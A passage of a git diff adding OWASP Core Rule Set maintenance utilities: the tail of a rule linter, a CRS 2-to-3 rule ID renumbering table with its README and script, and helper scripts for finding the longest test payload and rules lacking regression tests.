fromlines] + except: + errmsg(" Can't open file for indent check: %s" % (f)) + retval = 1 + # virtual output + mwriter = msc_pyparser.MSCWriter(parsed_structs[f]) + mwriter.generate() + #mwriter.output.append("") + output = [] + for l in mwriter.output: + if l == "\n": + output.append("\n") + else: + output += [l + "\n" for l in l.split("\n")] + + if len(fromlines) < len(output): + fromlines.append("\n") + elif len(fromlines) > len(output): + output.append("\n") + + diff = difflib.unified_diff(fromlines, output) + if fromlines == output: + msg(" Indentation check ok.") + else: + errmsg(" Indentation check found error(s)") + retval = 1 + for d in diff: + d = d.strip("\n") + r = re.match("^@@ -(\d+),(\d+) \+\d+,\d+ @@$", d) + if r: + line1, line2 = [int(i) for i in r.groups()] + e = { + 'indent' : 2, + 'file' : f, + 'title' : "Indentation error", + 'line' : line1, + 'endLine': line1+line2, + 'message': "an indentation error has found" + } + errmsgf(e) + errmsg(d.strip("\n")) + + ### check `ctl:auditLogParts=+E` right place in chained rules + c.check_ctl_audit_log() + if len(c.auditlogparts) == 0: + msg(" no 'ctl:auditLogParts' action found.") + else: + errmsg(" Found 'ctl:auditLogParts' action") + for a in c.auditlogparts: + a['indent'] = 2 + a['file'] = f + a['title'] = "'ctl:auditLogParts' isn't allowed in CRS" + errmsgf(a) + retval = 1 + + ### collect TX variables + # this method collects the TX variables, which set via a + # `setvar` action anywhere + # this method does not check any mandatory clause + c.collect_tx_variable(f) + + ### check duplicate ID's + # c.dupes filled during the tx variable collected + if len(c.dupes) == 0: + msg(" no duplicate id's") + else: + errmsg(" Found duplicated id('s)") + for a in c.dupes: + a['indent'] = 2 + a['file'] = f + a['title'] = "'id' is duplicated" + errmsgf(a) + retval = 1 + + ### check PL consistency + c.check_pl_consistency() + if len(c.pltags) == 0: + msg(" paranoia-level tags are correct.") + else: + errmsg(" Found incorrect paranoia-level/N tag(s)") + for a in c.pltags: + a['indent'] = 2 + a['file'] = f + a['title'] = "wrong or missing paranoia-level/N tag" + errmsgf(a) + retval = 1 + if len(c.plscores) == 0: + msg(" PL anomaly_scores are correct.") + else: + errmsg(" Found incorrect (inbound|outbout)_anomaly_score value(s)") + for a in c.plscores: + a['indent'] = 2 + a['file'] = f + a['title'] = "wrong (inbound|outbout)_anomaly_score variable or value" + errmsgf(a) + retval = 1 + + ### check existence of used TX variables + c.check_tx_variable(f) + if len(c.undef_txvars) == 0: + msg(" All TX variables are set") + else: + errmsg(" There are one or more unset TX variables.") + for a in c.undef_txvars: + a['indent'] = 2 + a['file'] = f + a['title'] = "unset TX variable" + errmsgf(a) + retval = 1 + msg("End of checking parsed rules") + msg("Cumulated report about unused TX variables") + has_unused = False + for tk in txvars: + if txvars[tk]['used'] == False: + if has_unused == False: + msg(" Unused TX variable(s):") + a = txvars[tk] + a['indent'] = 2 + a['title'] = "unused TX variable" + a['message'] = "unused variable: %s" % (tk) + errmsgf(a) + retval = 1 + has_unused = True + + if has_unused == False: + msg(" No unused TX variable") + + sys.exit(retval) diff --git a/nginx/config/owasp-crs/util/crs2-renumbering/IdNumbering.csv b/nginx/config/owasp-crs/util/crs2-renumbering/IdNumbering.csv new file mode 100644 index 00000000..269b88af --- /dev/null +++ b/nginx/config/owasp-crs/util/crs2-renumbering/IdNumbering.csv @@ -0,0 +1,1132 @@ +200000,000000 +200121,000000 +200273,000000 +200280,000000 +200281,000000 +200287,000000 +200289,000000 +200290,000000 +200299,000000 +200316,000000 +200333,000000 +200337,000000 +200350,000000 +200351,000000 +200366,000000 +200367,000000 +200368,000000 +200369,000000 +200370,000000 +200371,000000 +200372,000000 +200373,000000 +200374,000000 +200375,000000 +200376,000000 +200377,000000 +200378,000000 +200379,000000 +200381,000000 +200382,000000 +200383,000000 +200384,000000 +200385,000000 +200386,000000 +200387,000000 +200388,000000 +200389,000000 +200390,000000 +200391,000000 +200392,000000 +200394,000000 +200395,000000 +200396,000000 +200397,000000 +200398,000000 +200399,000000 +200400,000000 +200401,000000 +200402,000000 +200403,000000 +200404,000000 +200405,000000 +200406,000000 +200407,000000 +200408,000000 +200409,000000 +200410,000000 +200411,000000 +200412,000000 +200413,000000 +200414,000000 +200415,000000 +200416,000000 +200417,000000 +200418,000000 +200419,000000 +200420,000000 +200421,000000 +200422,000000 +200423,000000 +200424,000000 +200425,000000 +200426,000000 +200427,000000 +200428,000000 +200429,000000 +200430,000000 +200431,000000 +200432,000000 +200433,000000 +200434,000000 +200435,000000 +200436,000000 +200437,000000 +200438,000000 +200439,000000 +200440,000000 +200441,000000 +200442,000000 +200443,000000 +200445,000000 +200446,000000 +200447,000000 +200448,000000 +200449,000000 +200450,000000 +200451,000000 +200452,000000 +200453,000000 +200454,000000 +200455,000000 +200456,000000 +200457,000000 +200458,000000 +200459,000000 +200460,000000 +200461,000000 +200462,000000 +200463,000000 +200464,000000 +200465,000000 +200466,000000 +200467,000000 +200468,000000 +200469,000000 +200470,000000 +200471,000000 +200472,000000 +200473,000000 +200474,000000 +200475,000000 +200476,000000 +200477,000000 +200478,000000 +200479,000000 +200480,000000 +200481,000000 +200482,000000 +200483,000000 +200484,000000 +200485,000000 +200486,000000 +200487,000000 +200488,000000 +200489,000000 +200490,000000 +200491,000000 +200492,000000 +200493,000000 +200494,000000 +200495,000000 +200496,000000 +200497,000000 +200498,000000 +200499,000000 +200500,000000 +200501,000000 +200502,000000 +200503,000000 +200504,000000 +200505,000000 +200506,000000 +200507,000000 +200508,000000 +200509,000000 +200510,000000 +200511,000000 +200512,000000 +200513,000000 +200514,000000 +200515,000000 +200516,000000 +200517,000000 +200518,000000 +200519,000000 +200520,000000 +200521,000000 +200522,000000 +200523,000000 +200524,000000 +200525,000000 +200526,000000 +200527,000000 +200528,000000 +200529,000000 +200530,000000 +200532,000000 +200533,000000 +200534,000000 +200535,000000 +200536,000000 +200537,000000 +200538,000000 +200539,000000 +200540,000000 +200541,000000 +200542,000000 +200543,000000 +200544,000000 +200545,000000 +200546,000000 +200547,000000 +200548,000000 +200549,000000 +200550,000000 +200551,000000 +200552,000000 +200553,000000 +200554,000000 +200555,000000 +200556,000000 +200557,000000 +200558,000000 +200559,000000 +200560,000000 +200561,000000 +200562,000000 +200563,000000 +200564,000000 +200565,000000 +200566,000000 +200567,000000 +200568,000000 +200569,000000 +200570,000000 +200571,000000 +200572,000000 +200573,000000 +200574,000000 +200575,000000 +200576,000000 +200577,000000 +200578,000000 +200579,000000 +200580,000000 +200581,000000 +200582,000000 +200583,000000 +200584,000000 +200585,000000 +200586,000000 +200587,000000 +200588,000000 +200589,000000 +200590,000000 +200591,000000 +200592,000000 +200593,000000 +200594,000000 +200595,000000 +200596,000000 +200597,000000 +200598,000000 +200599,000000 +200600,000000 +200601,000000 +200602,000000 +200603,000000 +200604,000000 +200605,000000 +200606,000000 +200607,000000 +200608,000000 +200609,000000 +200610,000000 +200611,000000 +200612,000000 +200613,000000 +200614,000000 +200615,000000 +200616,000000 +200617,000000 +200618,000000 +200619,000000 +200620,000000 +200621,000000 +200622,000000 +200623,000000 +200624,000000 +200625,000000 +200626,000000 +200627,000000 +200628,000000 +200629,000000 +200630,000000 +200631,000000 +200632,000000 +200633,000000 +200634,000000 +200635,000000 +200645,000000 +200646,000000 +200647,000000 +200648,000000 +200649,000000 +200650,000000 +200651,000000 +200652,000000 +200653,000000 +200654,000000 +200655,000000 +200656,000000 +200657,000000 +200658,000000 +200659,000000 +200660,000000 +200661,000000 +200662,000000 +200663,000000 +200664,000000 +200665,000000 +200666,000000 +200667,000000 +200668,000000 +200669,000000 +200670,000000 +200671,000000 +200673,000000 +200674,000000 +200675,000000 +200676,000000 +200677,000000 +200678,000000 +200679,000000 +200680,000000 +200681,000000 +200682,000000 +200683,000000 +200684,000000 +200685,000000 +200686,000000 +200687,000000 +200688,000000 +200689,000000 +200690,000000 +200692,000000 +200693,000000 +200694,000000 +200695,000000 +200696,000000 +200697,000000 +200698,000000 +200699,000000 +200700,000000 +200701,000000 +200702,000000 +200703,000000 +200704,000000 +200705,000000 +200706,000000 +200707,000000 +200708,000000 +200709,000000 +200710,000000 +200711,000000 +200712,000000 +200713,000000 +200714,000000 +200718,000000 +200719,000000 +200720,000000 +200721,000000 +200722,000000 +200723,000000 +200724,000000 +200725,000000 +200726,000000 +200727,000000 +200728,000000 +200729,000000 +200730,000000 +200731,000000 +200732,000000 +200733,000000 +200734,000000 +200735,000000 +200736,000000 +200737,000000 +200738,000000 +200739,000000 +200740,000000 +200741,000000 +200742,000000 +200743,000000 +200744,000000 +200745,000000 +200746,000000 +200747,000000 +200748,000000 +200749,000000 +200751,000000 +200752,000000 +200753,000000 +200754,000000 +200755,000000 +200756,000000 +200789,000000 +200865,000000 +200868,000000 +200872,000000 +200882,000000 +200883,000000 +200884,000000 +200885,000000 +200887,000000 +200888,000000 +200889,000000 +200890,000000 +200892,000000 +200893,000000 +200896,000000 +200897,000000 +200899,000000 +200901,000000 +200905,000000 +200906,000000 +200907,000000 +200908,000000 +200910,000000 +200912,000000 +200914,000000 +200916,000000 +200917,000000 +200918,000000 +200919,000000 +200922,000000 +200923,000000 +200930,000000 +200931,000000 +200932,000000 +200933,000000 +200936,000000 +200937,000000 +200938,000000 +200939,000000 +200941,000000 +200942,000000 +200943,000000 +200945,000000 +200946,000000 +200950,000000 +200959,000000 +200964,000000 +200965,000000 +200966,000000 +200967,000000 +200969,000000 +200971,000000 +200972,000000 +200973,000000 +200974,000000 +200975,000000 +200976,000000 +200978,000000 +200979,000000 +200983,000000 +200984,000000 +200987,000000 +200988,000000 +200989,000000 +200990,000000 +200991,000000 +200992,000000 +200993,000000 +200994,000000 +200995,000000 +200996,000000 +200997,000000 +200999,000000 +201001,000000 +201002,000000 +201003,000000 +201004,000000 +201007,000000 +201008,000000 +201009,000000 +201012,000000 +201013,000000 +201014,000000 +201016,000000 +201017,000000 +201018,000000 +201019,000000 +201020,000000 +201022,000000 +201025,000000 +201026,000000 +201027,000000 +201034,000000 +201035,000000 +201036,000000 +201046,000000 +201047,000000 +201048,000000 +201055,000000 +201056,000000 +201061,000000 +201062,000000 +201063,000000 +201064,000000 +201065,000000 +201066,000000 +201070,000000 +201071,000000 +201072,000000 +201075,000000 +201077,000000 +201078,000000 +201080,000000 +201083,000000 +201084,000000 +201085,000000 +201086,000000 +201092,000000 +201094,000000 +201095,000000 +201097,000000 +201098,000000 +201099,000000 +201100,000000 +201101,000000 +201102,000000 +201104,000000 +201105,000000 +201106,000000 +201107,000000 +201108,000000 +201109,000000 +201110,000000 +201111,000000 +201113,000000 +201114,000000 +201115,000000 +201116,000000 +201117,000000 +201119,000000 +201120,000000 +201121,000000 +201125,000000 +201126,000000 +201127,000000 +201137,000000 +201138,000000 +201142,000000 +201145,000000 +201155,000000 +201156,000000 +201157,000000 +201166,000000 +201167,000000 +201172,000000 +201173,000000 +201182,000000 +201183,000000 +201184,000000 +201185,000000 +201187,000000 +201188,000000 +201192,000000 +201193,000000 +201194,000000 +201195,000000 +201200,000000 +201201,000000 +201202,000000 +201203,000000 +201204,000000 +201206,000000 +201207,000000 +201209,000000 +201212,000000 +201213,000000 +201216,000000 +201218,000000 +201219,000000 +201221,000000 +201222,000000 +201233,000000 +201234,000000 +201235,000000 +201236,000000 +201237,000000 +201238,000000 +201239,000000 +201240,000000 +201241,000000 +201242,000000 +201243,000000 +201247,000000 +201248,000000 +201249,000000 +201256,000000 +201257,000000 +201258,000000 +201260,000000 +201265,000000 +201266,000000 +201267,000000 +201268,000000 +201269,000000 +201270,000000 +201271,000000 +201272,000000 +201274,000000 +201275,000000 +201279,000000 +201282,000000 +201283,000000 +201287,000000 +201288,000000 +201294,000000 +201295,000000 +201299,000000 +201308,000000 +201309,000000 +201310,000000 +201311,000000 +201312,000000 +201313,000000 +201315,000000 +201322,000000 +201323,000000 +201330,000000 +201331,000000 +201342,000000 +201343,000000 +201346,000000 +201347,000000 +900001,000000 +900002,000000 +900003,000000 +900004,000000 +900005,000000 +900006,000000 +900007,000000 +900008,000000 +900009,000000 +900010,000000 +900011,000000 +900012,000000 +900013,000000 +900014,000000 +900015,000000 +900016,000000 +900017,000000 +900018,000000 +900019,000000 +900020,000000 +900021,000000 +900030,000000 +900031,000000 +900032,000000 +900033,000000 +900034,000000 +900035,000000 +900036,000000 +900037,000000 +900038,000000 +900039,000000 +900040,000000 +900041,000000 +900042,000000 +900043,000000 +900044,000000 +900045,000000 +900046,000000 +900047,000000 +900048,000000 +900050,910100 +900051,910110 +900051,910120 +910006,000000 +910007,000000 +910008,000000 +920005,000000 +920006,000000 +920007,000000 +920008,000000 +920009,000000 +920010,000000 +920011,000000 +920012,000000 +920013,000000 +920014,000000 +920015,000000 +920016,000000 +920017,000000 +920018,000000 +920019,000000 +920020,000000 +920021,000000 +920022,000000 +920023,000000 +950000,943120 +950001,942150 +950002,000000 +950003,943110 +950005,930120 +950006,000000 +950007,000000 +950008,000000 +950009,943100 +950010,000000 +950011,000000 +950012,921100 +950018,000000 +950019,000000 +950020,000000 +950103,930100 +950104,930110 +950107,920220 +950108,920240 +950109,920230 +950110,000000 +950115,000000 +950116,920260 +950117,931100 +950118,931110 +950119,931120 +950120,931130 +950801,920250 +950901,942130 +950907,932100 +950908,000000 +950910,921120 +950911,921130 +950912,921140 +950913,921150 +950914,921160 +950915,921110 +950921,000000 +950922,000000 +950923,000000 +958000,000000 +958001,000000 +958002,000000 +958003,000000 +958004,000000 +958005,000000 +958006,000000 +958007,000000 +958008,000000 +958009,000000 +958010,000000 +958011,000000 +958012,000000 +958013,000000 +958016,000000 +958017,000000 +958018,000000 +958019,000000 +958020,000000 +958022,000000 +958023,000000 +958024,000000 +958025,000000 +958026,000000 +958027,000000 +958028,000000 +958030,000000 +958031,000000 +958032,000000 +958033,000000 +958034,000000 +958036,000000 +958037,000000 +958038,000000 +958039,000000 +958040,000000 +958041,000000 +958045,000000 +958046,000000 +958047,000000 +958049,000000 +958051,000000 +958052,000000 +958054,000000 +958056,000000 +958057,000000 +958059,000000 +958230,920190 +958231,920200 +958291,000000 +958295,920210 +958297,000000 +958404,000000 +958405,000000 +958406,000000 +958407,000000 +958408,000000 +958409,000000 +958410,000000 +958411,000000 +958412,000000 +958413,000000 +958414,000000 +958415,000000 +958416,000000 +958417,000000 +958418,000000 +958419,000000 +958420,000000 +958421,000000 +958422,000000 +958423,000000 +958976,000000 +958977,933110 +958978,933000 +958979,933120 +958980,933130 +959070,942380 +959071,942390 +959072,942400 +959073,942410 +959151,933100 +960000,920120 +960001,000000 +960002,000000 +960003,000000 +960006,920330 +960007,920290 +960008,920280 +960009,920320 +960010,920420 +960011,920170 +960012,920180 +960014,000000 +960015,920300 +960016,920160 +960017,920350 +960018,000000 +960020,000000 +960021,920310 +960022,000000 +960024,942460 +960032,911100 +960034,920430 +960035,920440 +960038,920450 +960208,920370 +960209,920360 +960335,920380 +960341,920390 +960342,920400 +960343,920410 +960901,920270 +960902,000000 +960904,920340 +960911,920100 +960912,920130 +960913,000000 +960914,920140 +960915,920150 +970003,951100 +970004,954120 +970007,000000 +970008,000000 +970009,953100 +970010,000000 +970011,000000 +970012,000000 +970013,950130 +970014,952100 +970015,953110 +970016,000000 +970017,952110 +970017,954100 +970018,000000 +970021,000000 +970118,954110 +970901,950100 +970902,953120 +970903,000000 +970904,954130 +973300,941320 +973301,000000 +973302,000000 +973303,000000 +973304,000000 +973305,000000 +973306,000000 +973307,000000 +973308,000000 +973309,000000 +973310,000000 +973311,000000 +973312,000000 +973313,000000 +973314,000000 +973315,941190 +973316,000000 +973317,941300 +973318,941290 +973319,941310 +973320,941280 +973321,941270 +973322,941250 +973323,941240 +973324,941230 +973325,000000 +973326,941200 +973327,000000 +973328,000000 +973329,000000 +973330,000000 +973331,000000 +973332,941330 +973333,941340 +973334,000000 +973335,000000 +973336,941110 +973337,941120 +973338,941140 +973339,941130 +973340,941160 +973341,941170 +973342,941180 +973343,941100 +973344,941100 +973345,941220 +973346,941210 +973347,000000 +973348,941260 +973350,941150 +981000,000000 +981001,000000 +981003,000000 +981004,000000 +981005,000000 +981006,000000 +981007,000000 +981018,000000 +981020,901100 +981021,901110 +981022,000000 +981033,000000 +981034,000000 +981035,000000 +981036,000000 +981037,000000 +981038,000000 +981039,000000 +981040,000000 +981041,000000 +981042,000000 +981043,000000 +981044,912120 +981045,912130 +981046,912140 +981047,912150 +981048,912160 +981049,912170 +981050,000000 +981051,000000 +981052,000000 +981053,000000 +981054,000000 +981055,000000 +981056,000000 +981057,000000 +981058,000000 +981059,000000 +981060,000000 +981061,000000 +981062,000000 +981063,000000 +981064,000000 +981075,000000 +981076,000000 +981077,000000 +981078,000000 +981079,000000 +981080,000000 +981081,000000 +981082,000000 +981083,000000 +981084,000000 +981085,000000 +981086,000000 +981087,000000 +981088,000000 +981089,000000 +981090,000000 +981091,000000 +981092,000000 +981093,000000 +981094,000000 +981095,000000 +981096,000000 +981097,000000 +981098,000000 +981099,000000 +981100,000000 +981101,000000 +981102,000000 +981103,000000 +981104,000000 +981105,000000 +981110,000000 +981131,000000 +981132,000000 +981133,000000 +981134,000000 +981136,000000 +981137,000000 +981138,910140 +981139,910190 +981140,910000 +981141,910150 +981142,910160 +981143,910170 +981144,910180 +981145,000000 +981172,942420 +981173,942430 +981175,949100 +981176,949190 +981177,000000 +981178,000000 +981179,949110 +981180,949120 +981181,949130 +981182,949140 +981183,949150 +981184,949160 +981185,000000 +981186,949170 +981187,949180 +981188,000000 +981189,000000 +981190,000000 +981191,000000 +981192,000000 +981193,000000 +981194,000000 +981195,000000 +981196,000000 +981197,000000 +981198,000000 +981199,000000 +981200,959100 +981201,980100 +981202,980110 +981203,980120 +981204,980130 +981205,980140 +981219,000000 +981220,000000 +981221,000000 +981222,000000 +981223,000000 +981224,000000 +981227,920110 +981228,000000 +981229,000000 +981230,000000 +981231,942440 +981235,000000 +981236,000000 +981237,000000 +981238,000000 +981239,000000 +981240,942300 +981241,942230 +981242,942330 +981243,942370 +981244,942180 +981245,942260 +981246,942340 +981247,942360 +981248,942210 +981249,942310 +981250,942170 +981251,942350 +981252,942240 +981253,942320 +981254,942280 +981255,942190 +981256,942250 +981257,942200 +981260,942450 +981261,942100 +981270,942290 +981272,942160 +981276,942270 +981277,942220 +981300,000000 +981301,000000 +981302,000000 +981303,000000 +981304,000000 +981305,000000 +981306,000000 +981307,000000 +981308,000000 +981309,000000 +981310,000000 +981311,000000 +981312,000000 +981313,000000 +981314,000000 +981315,000000 +981316,000000 +981317,000000 +981318,942110 +981319,942120 +981320,942140 +981400,000000 +981401,000000 +981402,000000 +981403,000000 +981404,000000 +981405,000000 +981406,000000 +981407,000000 +990002,913100 +990012,000000 +990901,913110 +990902,913120 +999003,000000 +999004,000000 +999005,000000 +999006,000000 +999008,000000 +999010,000000 +999011,000000 +9700010,951110 +9700011,951120 +9700012,951130 +9700013,951140 +9700014,951150 +9700015,951160 +9700016,951170 +9700017,951180 +9700018,951190 +9700019,951200 +9700020,951210 +9700021,951220 +9700022,951230 +9700023,951240 +9700024,951250 +9700025,951260 diff --git a/nginx/config/owasp-crs/util/crs2-renumbering/README b/nginx/config/owasp-crs/util/crs2-renumbering/README new file mode 100644 index 00000000..fd1861dd --- /dev/null +++ b/nginx/config/owasp-crs/util/crs2-renumbering/README @@ -0,0 +1,30 @@ +CRS 2.x to 3.x migration utility +================================ + +In CRS 3.0, we have renumbered the rules to be more logical and helpful. +The new rule file names now correspond with the rule IDs in the file. +First rule of a given file is usually 9XX100, then the rules continue +in steps of ten. Related rules/siblings follow with a single digit +change (9XX101, etc.). + +This utility replaces CRS 2 ruleIds with their CRS 3 counterparts. +You can use it when migrating your CRS 2 exclusion/.conf files to CRS 3.0 +or higher. + +Example usage: + + ./update.py -f your_old_modsec_conf.conf + +Rules which have been removed in CRS 3 are listed with the new ID 000000 in the +CSV file. This means that the former rule is no longer part of CRS 3. If after +replacement you find a string 000000 in your config files, you can likely +remove that exclusion or special case. + +If you want to create your own tooling for this migration, you can use +the file idNumbering.csv in this directory. It lists the old rule IDs of +CRS 2.2, together with the corresponding rule IDs in CRS 3.0. + +A rule renumbering is painful for all existing installations. But we really +think that the rule IDs lacked sense and reason, and we are confident future +maintenance will be much easier once this is done. We do not plan to change +rule IDs after this. We appreciate your understanding in this matter. diff --git a/nginx/config/owasp-crs/util/crs2-renumbering/update.py b/nginx/config/owasp-crs/util/crs2-renumbering/update.py new file mode 100755 index 00000000..42ea75b9 --- /dev/null +++ b/nginx/config/owasp-crs/util/crs2-renumbering/update.py @@ -0,0 +1,55 @@ +#!/usr/bin/env python +# -*- coding: utf-8 -*- + +"""This is designed to convert 2.x CRS ID numbering to 3.x CRS numbering""" +from __future__ import print_function +import csv +import argparse +import os +import sys + +def main(): + """Main function that contains all the logic to relabel CRS IDs""" + + id_translation_file = os.path.join(sys.path[0], "IdNumbering.csv") + + if not os.path.isfile(id_translation_file): + sys.stderr.write("We were unable to locate the ID translation CSV (idNumbering.csv) \ + please place this is the same directory as this script\n") + sys.exit(1) + + parser = argparse.ArgumentParser(description="A program that takes in an exceptions file \ + and renumbers all the ID to match OWASP CRS 3 numbers. Output will be directed to STDOUT.") + parser.add_argument("-f", "--file", required=True, action="store", dest="fname", \ + help="the file to be renumbered") + args = parser.parse_args() + + if not os.path.isfile((args.fname).encode('utf8')): + sys.stderr.write("We were unable to find the file you were trying to update the ID numbers \ + in, please check your path\n") + sys.exit(1) + + fcontent = "" + + try: + update_file = open((args.fname).encode('utf-8'), "r") + try: + fcontent = update_file.read() + finally: + update_file.close() + except IOError: + sys.stderr.write("There was an error opening the file you were trying to update") + + if fcontent != "": + # CSV File + id_csv_file = open(id_translation_file, 'rt') + try: + reader = csv.reader(id_csv_file) + for row in reader: + fcontent = fcontent.replace(row[0], row[1]) + finally: + id_csv_file.close() + print(fcontent) + +if __name__ == "__main__": + main() diff --git a/nginx/config/owasp-crs/util/find-max-datalen-in-tests/README.md b/nginx/config/owasp-crs/util/find-max-datalen-in-tests/README.md new file mode 100644 index 00000000..8f2dcd8b --- /dev/null +++ b/nginx/config/owasp-crs/util/find-max-datalen-in-tests/README.md @@ -0,0 +1,47 @@ +# Find the longest data in CRS test cases + +This page describes how can you find the longest data string in CRS test cases. + +## Goals + +Some rules check the `FILES_COMBINED_SIZE` against the `TX:COMBINED_FILE_SIZES` variable. To check these work as well, we need to set the `tx.combined_file_sizes` variable and send a payload which is greater than this value - see [this](https://github.com/coreruleset/coreruleset/blob/v3.4/dev/tests/regression/README.md#requirements): + +``` +SecAction "id:900005,\ + phase:1,\ + nolog,\ + pass,\ + ctl:ruleEngine=DetectionOnly,\ + ctl:ruleRemoveById=910000,\ + setvar:tx.blocking_paranoia_level=4,\ + setvar:tx.crs_validate_utf8_encoding=1,\ + setvar:tx.arg_name_length=100,\ + setvar:tx.arg_length=400,\ + setvar:tx.combined_file_sizes=MAX_LEN" +``` + +In `modsecurity-crs-docker` [here](https://github.com/coreruleset/modsecurity-crs-docker/blob/master/src/opt/modsecurity/activate-rules.sh#L79-L82) is how the setting works. + +To configure the Github action, you need to set up this in CORERULESET/test/docker-compose.yaml: + +``` + ... + COMBINED_FILE_SIZES=MAX_LEN + ... +``` + +## Usage + +To find the possible value of MAX_LEN, run this script with one mandatory, and one optional argument. The mandatory argument is the path of the CRS directory (the root). The optional argument is the `-i` or `--ignoretests`, where you can pass the test id what you want to skip - eg. you want to use the test to exceed the maximum length. + +``` +./find_max_datalen.py ../.. -i 920410-1 +``` + +In this case, you pass the CRS root as parent dir, and skip the test id 920410-1, which wants to exceed the maximum length. + +## Prerequisites + +* Python3 interpreter +* Py-YAML +* CRS rule set diff --git a/nginx/config/owasp-crs/util/find-max-datalen-in-tests/find_max_datalen.py b/nginx/config/owasp-crs/util/find-max-datalen-in-tests/find_max_datalen.py new file mode 100755 index 00000000..aab66ac7 --- /dev/null +++ b/nginx/config/owasp-crs/util/find-max-datalen-in-tests/find_max_datalen.py @@ -0,0 +1,69 @@ +#!/usr/bin/env python3 + +# This file helps to find the longest data size in all test cases under +# CORERULESET_ROOT/test/regression/tests directory. + +# You just have to pass the CORERULESET_ROOT as argument. +# Optional argument can be passed -i or --ignoretests - the listed test +# cases will skipped. + +# At the end, the script will print the longest length, and the rule where +# the data is. + + +import sys +import os +import os.path +import yaml +import argparse + +if __name__ == "__main__": + + desc = """This script needs a mandatory argument where you pass the path to your +coreruleset. Then it iterates through tests, and finds the longest request +body (data) between test cases. To ignore a test case, pass the number of the +test with '-i' or '--ignoretests', eg.: '... -i 920410-1'""" + + parser = argparse.ArgumentParser(description=desc, formatter_class=argparse.RawTextHelpFormatter) + parser.add_argument('-i', '--ignoretests', metavar='ignoretests', + help='Ignore listed rules, separated by comma', required=False, + nargs=1) + parser.add_argument('crspath', metavar='/path/to/coreruleset', type=str, + help='Directory path to CRS') + args = parser.parse_args() + + test_cases = {} + testpath = args.crspath.rstrip("/") + "/tests/regression/tests" + + if not os.path.isdir(testpath): + print("Directory does not exist: %s" % (testpath)) + sys.exit(1) + + ignoretests = [] + if args.ignoretests is not None: + ignoretests = args.ignoretests[0].split(",") + + try: + max_len = 0 + max_title = "" + for root, dirs, files in os.walk(testpath): + path = root.split(os.sep) + for file in files: + if file.endswith(".yaml"): + with open(os.path.join(root, file)) as f: + test = yaml.full_load(f) + for t in test['tests']: + title = t['test_title'] + for s in t['stages']: + if 'stage' in s: + if 'input' in s['stage']: + if 'data' in s['stage']['input']: + if len(s['stage']['input']['data']) > max_len \ + and title not in ignoretests: + max_len = len(s['stage']['input']['data']) + max_title = title + print("Longest data: %d in test %s" % (max_len, max_title)) + except: + print("Can't open files in given path!") + print(sys.exc_info()) + sys.exit(1) diff --git a/nginx/config/owasp-crs/util/find-rules-without-test/README.md b/nginx/config/owasp-crs/util/find-rules-without-test/README.md new file mode 100644 index 00000000..faf8ed30 --- /dev/null +++ b/nginx/config/owasp-crs/util/find-rules-without-test/README.md @@ -0,0 +1,36 @@ +# Find the rules without test cases + +This page describes how can you find the rules without any test cases + +## Goal + +The main goal is that we must have at least one regression test for all relevant REQUEST- * rules. (In this context, the PL control rules are not relevant, because they do not need to have tests.) + +You need to pass the CORERULESET_ROOT as argument, eg: +``` +util/find-rules-without-test/find-rules-without-test.py /path/to/coreruleset +``` + +Optionally you can pass the argument `--output=github` or `--output=native`. The last one is the default. + +The script collects all available test files, based on the name of the test files. It will look up under CORERULESET_ROOT/tests/regression/tests/*. + +Then it starts to read all rule files with name "REQUEST-\*", which means this won't handle the RESPONSE-* rules. + +The script parses the rules, uses `msc_pyparser`, reads the rule's id, and tries to find the test case. + +The sctipt ignores the check in case of PL control rules (rules with id under 9XX100), and some hardcoded rules: + * REQUEST-900- + * REQUEST-901- + * REQUEST-905- + * REQUEST-910- + * REQUEST-912. + * REQUEST-949- + + +## Prerequisites + +* Python3 interpreter +* Py-YAML +* msc_pyparser +* CRS rule set diff --git a/nginx/config/owasp-crs/util/find-rules-without-test/find-rules-without-test.py b/nginx/config/owasp-crs/util/find-rules-without-test/find-rules-without-test.py new file mode 100755 index 00000000..6f893bce --- /dev/null +++ b/nginx/config/owasp-crs/util/find-rules-without-test/find-rules-without-test.py @@ -0,0 +1,137 @@ +#!/usr/bin/env python3 + +# This file helps to find the rules which does not have any test cases. +# +# You just have to pass the CORERULESET_ROOT as argument. +# +# At the end, the script will print the list of rules without any tests. +# +# Please note, that there are some exclusions: +# * only REQUEST-NNN rules are checked +# * there are some hardcoded exlucions: +# * REQUEST-900- +# * REQUEST-901- +# * REQUEST-905- +# * REQUEST-910- +# * REQUEST-912. +# * REQUEST-949- +# +# and the rule 921170 + +import sys +import glob +import msc_pyparser +import argparse + +EXCLUSION_LIST = ["900", "901", "905", "910", "912", "949", "921170"] +oformat = "native" + +def find_ids(s, test_cases): + """ + s: the parsed structure + test_cases: all available test cases + """ + rids = {} + for i in s: + # only SecRule counts + if i['type'] == "SecRule": + for a in i['actions']: + # find the `id` action + if a['act_name'] == "id": + # get the argument of the action + rid = int(a['act_arg']) # int + srid = a['act_arg'] # string + if (rid%1000) >= 100: # skip the PL control rules + # also skip these hardcoded rules + need_check = True + for excl in EXCLUSION_LIST: + if srid[:len(excl)] == excl: + need_check = False + if need_check: + # if there is no test cases, just print it + if rid not in test_cases: + rids[rid] = a['lineno'] + return rids + +def errmsgf(msg): + if oformat == "github": + print("::error file={file},line={line},endLine={endLine},title={title}::{message}".format(**msg)) + else: + print("file={file}, line={line}, endLine={endLine}, title={title}: {message}".format(**msg)) + +if __name__ == "__main__": + + desc = """This script helps to find the rules without test cases. It needs a mandatory +argument where you pass the path to your coreruleset. The tool collects the +tests with name REQUEST-*, but not with RESPONSE-*. Then reads the rule id's, +and check which rule does not have any test. Some rules does not need test +case, these are hardcoded as exclusions: 900NNN, 901NNN, 905NNN, 910NNN, +912NNN, 949NNN.""" + + parser = argparse.ArgumentParser(description=desc, formatter_class=argparse.RawTextHelpFormatter) + parser.add_argument("--output", dest="output", help="Output format native[default]|github", required=False) + parser.add_argument('crspath', metavar='/path/to/coreruleset', type=str, + help='Directory path to CRS') + args = parser.parse_args() + + if args.output is not None: + if args.output not in ["native", "github"]: + print("--output can be one of the 'native' or 'github'. Default value is 'native'") + sys.exit(1) + oformat = args.output + + test_cases = {} + # from argument, build the rules path and regression test paths + crspath = args.crspath.rstrip("/") + "/rules/*.conf" + testpath = args.crspath.rstrip("/") + "/tests/regression/tests/*" + retval = 0 + # collect rules + flist = glob.glob(crspath) + flist.sort() + if len(flist) == 0: + print("Can't open files in given path!") + sys.exit(1) + + # collect test cases + tlist = glob.glob(testpath) + tlist.sort() + if len(tlist) == 0: + print("Can't open files in given path (%s)!" % (testpath)) + sys.exit(1) + # find the yaml files with name REQUEST at the begin + # collect them in a dictionary + for 